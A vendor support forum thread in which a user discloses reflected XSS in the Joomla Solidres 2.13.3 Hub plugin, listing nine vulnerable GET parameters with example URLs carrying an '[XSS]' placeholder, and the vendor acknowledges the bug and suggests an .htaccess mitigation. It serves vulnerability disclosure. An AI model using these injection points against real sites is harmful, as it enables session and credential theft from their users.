Check Features
Quickstart Demos
Free Download
Buy Now
  1. Forum
  3. Community Forum
  5. Report bugs
  7. [RESOLVED] [Vulnerability] - Joomla Solidres 2.13.3 - Reflected XSS

[RESOLVED] [Vulnerability] - Joomla Solidres 2.13.3 - Reflected XSS

More
1 year 9 months ago #20001 by cracker
[RESOLVED] [Vulnerability] - Joomla Solidres 2.13.3 - Reflected XSS was created by cracker
# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 28/07/2023

## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials


GET parameter 'show' is vulnerable to XSS
GET parameter 'reviews' is vulnerable to XSS
GET parameter 'type_id' is vulnerable to XSS
GET parameter 'distance' is vulnerable to XSS
GET parameter 'facilities' is vulnerable to XSS
GET parameter 'categories' is vulnerable to XSS
GET parameter 'prices' is vulnerable to XSS
GET parameter 'location' is vulnerable to XSS
GET parameter 'Itemid' is vulnerable to XSS


https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14



[-] Done
Attachments:

Please Log in or Create an account to join the conversation.

More
1 year 9 months ago #20010 by solidres
Replied by solidres on topic [RESOLVED] [Vulnerability] - Joomla Solidres 2.13.3 - Reflected XSS
Hi,

Thank you for the report.

This issue is actually a Hub plugin bug, not Solidres core package bug. It will be fixed in the next Hub release.

In the meantime, all users are recommended to activate the default Joomla .htaccess file to block this type of exploit.

Regards,
FAQ: www.solidres.com/support/frequently-asked-questions
Support Policy: www.solidres.com/support-policy
The following user(s) said Thank You: joomleb

Please Log in or Create an account to join the conversation.

Moderators: solidres
  1. Forum
  3. Community Forum
  5. Report bugs
  7. [RESOLVED] [Vulnerability] - Joomla Solidres 2.13.3 - Reflected XSS
Powered by Kunena Forum

All the things you need to make your work easier. Did you like Solidres?

Purchase it now!

From the blog

More Posts

Interesting links

Contact info

Login